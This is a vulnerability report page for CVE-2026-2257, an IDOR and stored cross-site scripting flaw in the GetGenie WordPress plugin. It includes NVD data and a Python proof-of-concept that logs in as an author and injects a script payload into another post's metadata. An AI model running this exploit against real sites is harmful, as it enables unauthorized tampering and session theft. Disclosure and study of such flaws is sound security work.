Security Vulnerability Report
中文
CVE-2026-2257 CVSS 6.4 MEDIUM

CVE-2026-2257

Published: 2026-03-13 19:54:33
Last Modified: 2026-04-22 21:30:26
Source: [email protected]

Description

The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key in the `action` function. This makes it possible for authenticated attackers, with Author-level access and above, to update post metadata for arbitrary posts. Combined with a lack of input sanitization, this leads to Stored Cross-Site Scripting when a higher-privileged user (such as an Administrator) views the affected post's "Competitor" tab in the GetGenie sidebar.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GetGenie plugin for WordPress <= 4.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-2257 PoC - GetGenie IDOR + Stored XSS # Target: WordPress with GetGenie plugin <= 4.3.2 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_author" PASSWORD = "attacker_password" TARGET_POST_ID = 123 # Target post ID to inject XSS XSS_PAYLOAD = "<script>alert(document.cookie)</script>" def get_nonce(url, username, password): """Login and get WordPress nonce""" session = requests.Session() login_url = f"{url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } session.post(login_url, data=login_data) # Get nonce from admin or plugin page admin_url = f"{url}/wp-admin/admin.php?page=getgenie_dashboard" resp = session.get(admin_url) # Extract nonce from page content import re nonce_match = re.search(r'nonce":"([a-zA-Z0-9]+)"', resp.text) if nonce_match: return session, nonce_match.group(1) return session, None def exploit_idor_xss(url, session, nonce, post_id, payload): """Exploit IDOR to update arbitrary post metadata with XSS""" exploit_url = f"{url}/wp-admin/admin-ajax.php" # Construct the malicious request data = { "action": "getgenie_store", "_wpnonce": nonce, "post_id": post_id, # IDOR: can target any post "competitor": payload # XSS payload } response = session.post(exploit_url, data=data) return response.status_code == 200 if __name__ == "__main__": print(f"[*] CVE-2026-2257 PoC - GetGenie IDOR + Stored XSS") print(f"[*] Target: {TARGET_URL}") print(f"[*] Targeting post ID: {TARGET_POST_ID}") session, nonce = get_nonce(TARGET_URL, USERNAME, PASSWORD) if not nonce: print("[-] Failed to obtain nonce") sys.exit(1) print("[+] Logged in successfully") if exploit_idor_xss(TARGET_URL, session, nonce, TARGET_POST_ID, XSS_PAYLOAD): print(f"[+] XSS payload injected into post {TARGET_POST_ID}") print(f"[+] Payload will execute when admin views Competitor tab") else: print("[-] Exploitation failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2257", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:33.467", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GetGenie plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.3.2 due to missing validation on a user controlled key in the `action` function. This makes it possible for authenticated attackers, with Author-level access and above, to update post metadata for arbitrary posts. Combined with a lack of input sanitization, this leads to Stored Cross-Site Scripting when a higher-privileged user (such as an Administrator) views the affected post's \"Competitor\" tab in the GetGenie sidebar."}, {"lang": "es", "value": "El plugin GetGenie para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 4.3.2, inclusive, debido a la falta de validación en una clave controlada por el usuario en la función 'action'. Esto permite a atacantes autenticados, con acceso de nivel Autor o superior, actualizar los metadatos de publicaciones arbitrarias. Combinado con la falta de saneamiento de entrada, esto conduce a cross-site scripting almacenado cuando un usuario con mayores privilegios (como un Administrador) visualiza la pestaña 'Competitor' de la publicación afectada en la barra lateral de GetGenie."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/Store.php#L32", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/getgenie/tags/4.3.2/app/Api/Store.php#L74", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3479838%40getgenie%2Ftrunk&old=3446466%40getgenie%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f7b119d-ec56-40cb-80ef-67585dadad77?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.